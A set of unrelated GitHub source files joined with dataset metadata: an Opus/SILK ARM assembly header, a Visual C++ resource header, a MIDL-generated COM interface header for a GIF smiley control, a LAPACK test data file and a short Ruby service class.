LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#ifndef SILK_SIGPROC_FIX_ARMv5E_H
#define SILK_SIGPROC_FIX_ARMv5E_H
#undef silk_SMULTT
static OPUS_INLINE opus_int32 silk_SMULTT_armv5e(opus_int32 a, opus_int32 b)
{
opus_int32 res;
__asm__(
"#silk_SMULTT\n\t"
"smultt %0, %1, %2\n\t"
: "=r"(res)
: "%r"(a), "r"(b)
);
return res;
}
#define silk_SMULTT(a, b) (silk_SMULTT_armv5e(a, b))
#undef silk_SMLATT
static OPUS_INLINE opus_int32 silk_SMLATT_armv5e(opus_int32 a, opus_int32 b,
opus_int32 c)
{
opus_int32 res;
__asm__(
"#silk_SMLATT\n\t"
"smlatt %0, %1, %2, %3\n\t"
: "=r"(res)
: "%r"(b), "r"(c), "r"(a)
);
return res;
}
#define silk_SMLATT(a, b, c) (silk_SMLATT_armv5e(a, b, c))
#endif
| {
"pile_set_name": "Github"
} |
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by Resource.rc
//
#define IDI_ICON1 101
#define IDI_MAIN_ICON 101
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 102
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1001
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
| {
"pile_set_name": "Github"
} |
/* this ALWAYS GENERATED file contains the definitions for the interfaces */
/* File created by MIDL compiler version 6.00.0361 */
/* at Wed Dec 19 17:45:04 2007
*/
/* Compiler settings for .\_GifSmiley.idl:
Oicf, W1, Zp8, env=Win32 (32b run)
protocol : dce , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
//@@MIDL_FILE_HEADING( )
#pragma warning( disable: 4049 ) /* more than 64k source lines */
#pragma once
/* verify that the <rpcndr.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 475
#endif
#include "rpc.h"
#include "rpcndr.h"
#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif // __RPCNDR_H_VERSION__
#ifndef COM_NO_WINDOWS_H
#include "windows.h"
#include "ole2.h"
#endif /*COM_NO_WINDOWS_H*/
#ifndef __GifSmiley_h__
#define __GifSmiley_h__
#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif
/* Forward Declarations */
#ifndef __IGifSmileyCtrl_FWD_DEFINED__
#define __IGifSmileyCtrl_FWD_DEFINED__
typedef interface IGifSmileyCtrl IGifSmileyCtrl;
#endif /* __IGifSmileyCtrl_FWD_DEFINED__ */
#ifndef __CGifSmileyCtrl_FWD_DEFINED__
#define __CGifSmileyCtrl_FWD_DEFINED__
#ifdef __cplusplus
typedef class CGifSmileyCtrl CGifSmileyCtrl;
#else
typedef struct CGifSmileyCtrl CGifSmileyCtrl;
#endif /* __cplusplus */
#endif /* __CGifSmileyCtrl_FWD_DEFINED__ */
/* header files for imported files */
#include "prsht.h"
#include "mshtml.h"
#include "mshtmhst.h"
#include "exdisp.h"
#include "objsafe.h"
#ifdef __cplusplus
extern "C"{
#endif
void * __RPC_USER MIDL_user_allocate(size_t);
void __RPC_USER MIDL_user_free( void * );
#ifndef __IGifSmileyCtrl_INTERFACE_DEFINED__
#define __IGifSmileyCtrl_INTERFACE_DEFINED__
/* interface IGifSmileyCtrl */
/* [unique][helpstring][dual][uuid][object] */
namespace GifSmiley {
//const IID IID_IGifSmileyCtrl;
#define DEFINE_GUIDXXX(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8) \
EXTERN_C const GUID CDECL name \
= { l, w1, w2, { b1, b2, b3, b4, b5, b6, b7, b8 } }
DEFINE_GUIDXXX(IID_IGifSmileyCtrl, 0xCB64102B, 0x8CE4, 0x4A55, 0xB0, 0x50,
0x13, 0x1C, 0x43, 0x5A, 0x3A, 0x3F);
#if defined(__cplusplus) && !defined(CINTERFACE)
MIDL_INTERFACE("CB64102B-8CE4-4A55-B050-131C435A3A3F")
IGifSmileyCtrl : public IDispatch
{
public:
virtual /* [id][requestedit][bindable][propput] */ HRESULT STDMETHODCALLTYPE put_BackColor(
/* [in] */ OLE_COLOR clr) = 0;
virtual /* [id][requestedit][bindable][propget] */ HRESULT STDMETHODCALLTYPE get_BackColor(
/* [retval][out] */ OLE_COLOR *pclr) = 0;
virtual /* [id][requestedit][bindable][propget] */ HRESULT STDMETHODCALLTYPE get_HWND(
/* [retval][out] */ long *pHWND) = 0;
virtual /* [id] */ HRESULT STDMETHODCALLTYPE LoadFromFile(
/* [in] */ BSTR bstrFileName) = 0;
virtual /* [id] */ HRESULT STDMETHODCALLTYPE LoadFromFileSized(
/* [in] */ BSTR bstrFileName,
/* [in] */ INT nWidth,
/* [in] */ INT nHeight) = 0;
virtual /* [id] */ HRESULT STDMETHODCALLTYPE SetHostWindow(
/* [in] */ long hwndHostWindow,
/* [in] */ INT nNotyfyMode) = 0;
virtual /* [id] */ HRESULT STDMETHODCALLTYPE FileName(
/* [retval][out] */ BSTR* pVal) = 0;
virtual /* [id] */ HRESULT STDMETHODCALLTYPE FreeImage(
) = 0;
};
#else /* C style interface */
typedef struct IGifSmileyCtrlVtbl
{
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
IGifSmileyCtrl * This,
/* [in] */ REFIID riid,
/* [iid_is][out] */ void **ppvObject);
ULONG(STDMETHODCALLTYPE *AddRef)(
IGifSmileyCtrl * This);
ULONG(STDMETHODCALLTYPE *Release)(
IGifSmileyCtrl * This);
HRESULT(STDMETHODCALLTYPE *GetTypeInfoCount)(
IGifSmileyCtrl * This,
/* [out] */ UINT *pctinfo);
HRESULT(STDMETHODCALLTYPE *GetTypeInfo)(
IGifSmileyCtrl * This,
/* [in] */ UINT iTInfo,
/* [in] */ LCID lcid,
/* [out] */ ITypeInfo **ppTInfo);
HRESULT(STDMETHODCALLTYPE *GetIDsOfNames)(
IGifSmileyCtrl * This,
/* [in] */ REFIID riid,
/* [size_is][in] */ LPOLESTR *rgszNames,
/* [in] */ UINT cNames,
/* [in] */ LCID lcid,
/* [size_is][out] */ DISPID *rgDispId);
/* [local] */ HRESULT(STDMETHODCALLTYPE *Invoke)(
IGifSmileyCtrl * This,
/* [in] */ DISPID dispIdMember,
/* [in] */ REFIID riid,
/* [in] */ LCID lcid,
/* [in] */ WORD wFlags,
/* [out][in] */ DISPPARAMS *pDispParams,
/* [out] */ VARIANT *pVarResult,
/* [out] */ EXCEPINFO *pExcepInfo,
/* [out] */ UINT *puArgErr);
/* [id][requestedit][bindable][propput] */ HRESULT(STDMETHODCALLTYPE *put_BackColor)(
IGifSmileyCtrl * This,
/* [in] */ OLE_COLOR clr);
/* [id][requestedit][bindable][propget] */ HRESULT(STDMETHODCALLTYPE *get_BackColor)(
IGifSmileyCtrl * This,
/* [retval][out] */ OLE_COLOR *pclr);
/* [id][requestedit][bindable][propget] */ HRESULT(STDMETHODCALLTYPE *get_HWND)(
IGifSmileyCtrl * This,
/* [retval][out] */ long *pHWND);
/* [id] */ HRESULT(STDMETHODCALLTYPE *LoadFromFile)(
IGifSmileyCtrl * This,
/* [in] */ BSTR bstrFileName);
/* [id] */ HRESULT(STDMETHODCALLTYPE *LoadFromFileSized)(
IGifSmileyCtrl * This,
/* [in] */ BSTR bstrFileName,
/* [in] */ INT nWidth,
/* [in] */ INT nHeight);
/* [id] */ HRESULT(STDMETHODCALLTYPE *SetHostWindow)(
IGifSmileyCtrl * This,
/* [in] */ long hwndHostWindow,
/* [in] */ INT nNotyfyMode);
END_INTERFACE
} IGifSmileyCtrlVtbl;
interface IGifSmileyCtrl
{
CONST_VTBL struct IGifSmileyCtrlVtbl *lpVtbl;
};
#ifdef COBJMACROS
#define IGifSmileyCtrl_QueryInterface(This,riid,ppvObject) \
(This)->lpVtbl->QueryInterface(This, riid, ppvObject)
#define IGifSmileyCtrl_AddRef(This) \
(This)->lpVtbl->AddRef(This)
#define IGifSmileyCtrl_Release(This) \
(This)->lpVtbl->Release(This)
#define IGifSmileyCtrl_GetTypeInfoCount(This,pctinfo) \
(This)->lpVtbl->GetTypeInfoCount(This, pctinfo)
#define IGifSmileyCtrl_GetTypeInfo(This,iTInfo,lcid,ppTInfo) \
(This)->lpVtbl->GetTypeInfo(This, iTInfo, lcid, ppTInfo)
#define IGifSmileyCtrl_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) \
(This)->lpVtbl->GetIDsOfNames(This, riid, rgszNames, cNames, lcid, rgDispId)
#define IGifSmileyCtrl_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) \
(This)->lpVtbl->Invoke(This, dispIdMember, riid, lcid, wFlags, pDispParams, pVarResult, pExcepInfo, puArgErr)
#define IGifSmileyCtrl_put_BackColor(This,clr) \
(This)->lpVtbl->put_BackColor(This, clr)
#define IGifSmileyCtrl_get_BackColor(This,pclr) \
(This)->lpVtbl->get_BackColor(This, pclr)
#define IGifSmileyCtrl_get_HWND(This,pHWND) \
(This)->lpVtbl->get_HWND(This, pHWND)
#define IGifSmileyCtrl_LoadFromFile(This,bstrFileName) \
(This)->lpVtbl->LoadFromFile(This, bstrFileName)
#define IGifSmileyCtrl_LoadFromFileSized(This,bstrFileName,nWidth,nHeight) \
(This)->lpVtbl->LoadFromFileSized(This, bstrFileName, nWidth, nHeight)
#define IGifSmileyCtrl_SetHostWindow(This,hwndHostWindow,nNotyfyMode) \
(This)->lpVtbl->SetHostWindow(This, hwndHostWindow, nNotyfyMode)
#endif /* COBJMACROS */
#endif /* C style interface */
/* [id][requestedit][bindable][propput] */ HRESULT STDMETHODCALLTYPE IGifSmileyCtrl_put_BackColor_Proxy(
IGifSmileyCtrl * This,
/* [in] */ OLE_COLOR clr);
void __RPC_STUB IGifSmileyCtrl_put_BackColor_Stub(
IRpcStubBuffer *This,
IRpcChannelBuffer *_pRpcChannelBuffer,
PRPC_MESSAGE _pRpcMessage,
DWORD *_pdwStubPhase);
/* [id][requestedit][bindable][propget] */ HRESULT STDMETHODCALLTYPE IGifSmileyCtrl_get_BackColor_Proxy(
IGifSmileyCtrl * This,
/* [retval][out] */ OLE_COLOR *pclr);
void __RPC_STUB IGifSmileyCtrl_get_BackColor_Stub(
IRpcStubBuffer *This,
IRpcChannelBuffer *_pRpcChannelBuffer,
PRPC_MESSAGE _pRpcMessage,
DWORD *_pdwStubPhase);
/* [id][requestedit][bindable][propget] */ HRESULT STDMETHODCALLTYPE IGifSmileyCtrl_get_HWND_Proxy(
IGifSmileyCtrl * This,
/* [retval][out] */ long *pHWND);
void __RPC_STUB IGifSmileyCtrl_get_HWND_Stub(
IRpcStubBuffer *This,
IRpcChannelBuffer *_pRpcChannelBuffer,
PRPC_MESSAGE _pRpcMessage,
DWORD *_pdwStubPhase);
/* [id] */ HRESULT STDMETHODCALLTYPE IGifSmileyCtrl_LoadFromFile_Proxy(
IGifSmileyCtrl * This,
/* [in] */ BSTR bstrFileName);
void __RPC_STUB IGifSmileyCtrl_LoadFromFile_Stub(
IRpcStubBuffer *This,
IRpcChannelBuffer *_pRpcChannelBuffer,
PRPC_MESSAGE _pRpcMessage,
DWORD *_pdwStubPhase);
/* [id] */ HRESULT STDMETHODCALLTYPE IGifSmileyCtrl_LoadFromFileSized_Proxy(
IGifSmileyCtrl * This,
/* [in] */ BSTR bstrFileName,
/* [in] */ INT nWidth,
/* [in] */ INT nHeight);
void __RPC_STUB IGifSmileyCtrl_LoadFromFileSized_Stub(
IRpcStubBuffer *This,
IRpcChannelBuffer *_pRpcChannelBuffer,
PRPC_MESSAGE _pRpcMessage,
DWORD *_pdwStubPhase);
/* [id] */ HRESULT STDMETHODCALLTYPE IGifSmileyCtrl_SetHostWindow_Proxy(
IGifSmileyCtrl * This,
/* [in] */ long hwndHostWindow,
/* [in] */ INT nNotyfyMode);
void __RPC_STUB IGifSmileyCtrl_SetHostWindow_Stub(
IRpcStubBuffer *This,
IRpcChannelBuffer *_pRpcChannelBuffer,
PRPC_MESSAGE _pRpcMessage,
DWORD *_pdwStubPhase);
#endif /* __IGifSmileyCtrl_INTERFACE_DEFINED__ */
#ifndef __GifSmiley_LIBRARY_DEFINED__
#define __GifSmiley_LIBRARY_DEFINED__
/* library GifSmiley */
/* [helpstring][custom][uuid][version] */
const IID LIBID_GifSmiley;
CLSID CLSID_CGifSmileyCtrl = { 0xDB35DD77, 0x55E2, 0x4905, { 0x80, 0x75, 0xEB, 0x35, 0x1B, 0xB5, 0xCB, 0xC1 } };
// const CLSID CLSID_CGifSmileyCtrl;
// struct __declspec(uuid("DB35DD77-55E2-4905-8075-EB351BB5CBC1")) CLSID_CGifSmileyCtrl;
#ifdef __cplusplus
class DECLSPEC_UUID("DB35DD77-55E2-4905-8075-EB351BB5CBC1")
CGifSmileyCtrl;
#endif
#endif /* __GifSmiley_LIBRARY_DEFINED__ */
/* Additional Prototypes for ALL interfaces */
unsigned long __RPC_USER BSTR_UserSize(unsigned long *, unsigned long, BSTR *);
unsigned char * __RPC_USER BSTR_UserMarshal(unsigned long *, unsigned char *, BSTR *);
unsigned char * __RPC_USER BSTR_UserUnmarshal(unsigned long *, unsigned char *, BSTR *);
void __RPC_USER BSTR_UserFree(unsigned long *, BSTR *);
/* end of Additional Prototypes */
}
#ifdef __cplusplus
}
#endif
#endif
| {
"pile_set_name": "Github"
} |
Data file for testing DOUBLE PRECISION LAPACK linear equation routines RFP format
9 Number of values of N (at most 9)
0 1 2 3 5 6 10 11 50 Values of N
3 Number of values of NRHS (at most 9)
1 2 15 Values of NRHS (number of right hand sides)
9 Number of matrix types (list types on next line if 0 < NTYPES < 9)
1 2 3 4 5 6 7 8 9 Matrix Types
30.0 Threshold value of test ratio
T Put T to test the error exits
| {
"pile_set_name": "Github"
} |
# frozen_string_literal: true
class BaseService
attr_accessor :current_user, :params
def initialize(user, params = {})
@current_user = user
@params = params.dup
end
end
| {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.